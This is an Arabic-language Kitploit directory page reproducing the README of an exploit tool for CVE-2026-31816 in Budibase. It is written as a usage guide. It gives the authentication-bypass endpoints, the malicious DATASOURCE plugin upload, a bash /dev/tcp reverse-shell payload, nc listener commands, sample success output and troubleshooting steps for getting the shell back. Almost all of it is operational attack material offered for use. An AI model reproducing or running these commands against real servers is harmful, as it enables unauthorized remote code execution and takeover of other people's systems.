Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-31816-rshell — يستغل ثغرة CVE-2026-31816 في Budibase لتجاوز المصادقة، ورفع مكوّن إضافي خبيث لمصدر البيانات، وتنفيذ قشرة عكسية للوصول عن بُعد. | Kitploit
أدوات/GitHubGitHub/imjdl/cve-2026-31816-rshell
الاستغلالاستغلال تطبيقات الويبالمصادقةأداة الوصول عن بعدتطوير الحمولات
GitHubimjdl/cve-2026-31816-rshell

CVE-2026-31816-rshell

يستغل ثغرة CVE-2026-31816 في Budibase لتجاوز المصادقة، ورفع مكوّن إضافي خبيث لمصدر البيانات، وتنفيذ قشرة عكسية للوصول عن بُعد.

عرض المستودع
منذ 5 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

استغلال CVE-2026-31816 للاتصال العكسي (Reverse Shell)

نظرة عامة

تستغل هذه الأداة ثغرة CVE-2026-31816 لإنشاء اتصال عكسي (reverse shell) على خادم Budibase مستهدف.

سلسلة الهجوم: تجاوز المصادقة ← رفع إضافة DATASOURCE ← تنفيذ كود من جهة الخادم ← اتصال عكسي (Reverse Shell)

المتطلبات

  • Python 3.6+
  • مكتبة requests (pip install requests)
  • خادم Budibase مستهدف معرّض لثغرة CVE-2026-31816

الاستخدام

الخطوات الأساسية

root@kitploit:~
# 1. تشغيل المستمع على جهاز المهاجم
nc -lvnp 4444

# 2. تشغيل الاستغلال (في طرفية أخرى)
python3 CVE-2026-31816-rshell.py -t http://target:10000 --lhost YOUR_IP --lport 4444

المعاملات

ParameterRequiredDescription
-t, --target✅رابط خادم Budibase المستهدف
--lhost✅مضيف المستمع (عنوان IP الخاص بك)
--lport❌منفذ المستمع (الافتراضي: 4444)

أمثلة

root@kitploit:~
# عنوان IP للمهاجم: 192.168.1.100
# خادم Budibase المستهدف: 192.168.1.128:10000

# الطرفية 1 - تشغيل المستمع
nc -lvnp 4444

# الطرفية 2 - تشغيل الاستغلال
python3 CVE-2026-31816-rshell.py \
    -t http://192.168.1.128:10000 \
    --lhost 192.168.1.100 \
    --lport 4444

كيف يعمل

1. فحص الثغرة

root@kitploit:~
GET /api/integrations?/webhooks/trigger

إذا تم إرجاع 200، فإن الهدف معرّض لتجاوز المصادقة.

2. إنشاء إضافة خبيثة

root@kitploit:~
{
  "type": "datasource",
  "schema": { ... }
}

إضافات نوع DATASOURCE تنفذ كود JavaScript على الخادم.

3. حمولة الاتصال العكسي (Reverse Shell Payload)

root@kitploit:~
// يتم تنفيذها عند التحقق من الإضافة:
bash -c 'bash -i >& /dev/tcp/LHOST/LPORT 0>&1'

4. الرفع والتنفيذ

root@kitploit:~
POST /api/plugin/upload?/webhooks/trigger

رفع الإضافة مع تجاوز المصادقة. يتم تنفيذ الكود أثناء التحقق.

تدفق الهجوم

root@kitploit:~
┌─────────────┐     ┌─────────────┐     ┌─────────────┐
│  Attacker   │     │   Target    │     │  Listener   │
│             │     │   Server    │     │   (nc)      │
│             │     │             │     │             │
│ exploit ────┼────►│ Upload      │     │             │
│             │     │ Plugin      │     │             │
│             │     │ Execute     │────►│ Listen      │
│             │     │ Code        │◄────┤ Reverse     │
│             │     │             │     │ Connect     │
└─────────────┘     └─────────────┘     └─────────────┘

مؤشر النجاح

root@kitploit:~
============================================================
CVE-2026-31816 - Reverse Shell Exploit
============================================================
[*] Target: http://192.168.1.128:10000
[*] Reverse shell: 192.168.1.100:4444

[*] Checking vulnerability...
[+] Target is vulnerable!
[*] Creating reverse shell plugin targeting 192.168.1.100:4444

[*] Uploading reverse shell plugin...
[*] Status: 200
[+] Plugin installed successfully!

============================================================
[+] SUCCESS! Check your listener!
============================================================

استكشاف الأخطاء وإصلاحها

س: فشل الاتصال، لم يتم استلام أي شل

الأسباب المحتملة:

  1. جدار الحماية يمنع الاتصال العكسي
  2. خادم الهدف لا يمكنه الوصول إلى عنوان IP الخاص بالمهاجم
  3. خادم الهدف لا يحتوي على bash

الحلول:

root@kitploit:~
# التحقق من اتصال الشبكة
ping YOUR_IP

# التحقق من جدار الحماية
sudo ufw allow 4444/tcp

# تجربة منفذ مختلف
nc -lvnp 8080

س: فشل الرفع

الأسباب المحتملة:

  1. الهدف قام بتصحيح الثغرة
  2. مشاكل في الشبكة

الحلول:

root@kitploit:~
# اختبار وجود الثغرة يدويًا
curl -s "http://target:10000/api/integrations?/webhooks/trigger"
# إذا تم إرجاع JSON، فإن الثغرة موجودة
تنزيل الأداة